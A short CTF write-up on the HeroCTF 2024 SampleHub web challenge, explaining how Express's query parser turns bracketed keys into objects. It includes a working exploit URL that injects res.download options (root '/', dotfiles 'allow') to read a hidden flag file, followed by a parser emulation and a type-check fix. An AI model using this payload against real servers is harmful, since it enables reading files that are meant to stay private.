Express req.query Notes

Notes from HeroCTF 2024 SampleHub [WEB].

Given this code snippet:

// Vulnerable handler as given in the challenge (imports and app setup added so it runs)
const express = require("express");
const path = require("path");

const app = express();

process.chdir(path.join(__dirname, "samples"));
app.get("/download/:file", (req, res) => {
    // basename() strips directory components, so the path itself cannot traverse
    const file = path.basename(req.params.file);
    console.log(typeof req.query.filename);
    // req.query.filename is passed straight through as res.download()'s second argument
    res.download(file, req.query.filename || "sample.png", (err) => {
        if (err) {
            res.status(404).send(`File "${file}" not found`);
        }
    });
});

app.listen(3000);

typeof req.query.filename is "string" if the request is something like:

http://localhost:3000/download/whatever?filename=first

But typeof req.query.filename is "object" (an array of both values) if the request is something like:

http://localhost:3000/download/whatever?filename=first&filename=second

Bracket notation in the query string is parsed into an object, so we can also inject object properties like this:

http://localhost:3000/download/.flag.txt?filename[root]=/&filename[dotfiles]=allow

typeof req.query.filename will also be "object" for any bracketed key, i.e. something like:

filename[whatever]
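The root cause is that Express's default "extended" query parser (the qs library) turns repeated keys into arrays and bracketed keys into nested objects, while res.download(path [, filename] [, options] [, fn]) treats a second argument that is an object as its options. The block below is an added example, not code from the challenge or from Express: parseQuery is a deliberately simplified stand-in for qs.parse that only handles repeated keys and one level of brackets (real qs handles much more), and safeDownloadName is a hypothetical defensive accessor that refuses anything other than a single plain string before it could reach res.download.

```javascript
// Added example (assumption: simplified emulation of qs behaviour, not the real library).
// Shows how the same parameter name can arrive as a string, an array, or an object,
// and a check that only lets a plain string through.

// Minimal stand-in for qs.parse: handles "key=value", repeated keys and one level
// of "key[sub]=value". Real qs supports deeper nesting and many more edge cases.
function parseQuery(queryString) {
  const result = {};
  for (const pair of queryString.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? "" : decodeURIComponent(pair.slice(eq + 1));
    const bracket = /^([^\[]+)\[([^\]]*)\]$/.exec(key);
    if (bracket) {
      // filename[root]=/ -> { filename: { root: "/" } }
      const [, base, sub] = bracket;
      if (typeof result[base] !== "object" || result[base] === null || Array.isArray(result[base])) {
        result[base] = {};
      }
      result[base][sub] = value;
    } else if (key in result) {
      // filename=first&filename=second -> { filename: ["first", "second"] }
      result[key] = Array.isArray(result[key]) ? [...result[key], value] : [result[key], value];
    } else {
      result[key] = value;
    }
  }
  return result;
}

// Hypothetical defensive accessor: returns the fallback when the parameter is absent,
// the string when it is a single plain string, and null (caller should respond 400)
// when the parser expanded it into an array or object.
function safeDownloadName(query, fallback = "sample.png") {
  const v = query.filename;
  if (v === undefined) return fallback;
  if (typeof v !== "string") return null;
  return v;
}

// Quick demonstration of the three shapes the parameter can take
for (const qs of ["filename=first", "filename=first&filename=second", "filename[root]=/&filename[dotfiles]=allow"]) {
  const q = parseQuery(qs);
  console.log(qs, "->", typeof q.filename, "safe:", safeDownloadName(q));
}
```

In the real handler the same check would sit before res.download: reject the request with a 400 whenever typeof req.query.filename !== "string", so that neither the array nor the options object form can ever reach the call. Switching app.set("query parser", "simple") also prevents the bracket-to-object expansion, but the type check is the more robust fix because it does not depend on parser configuration.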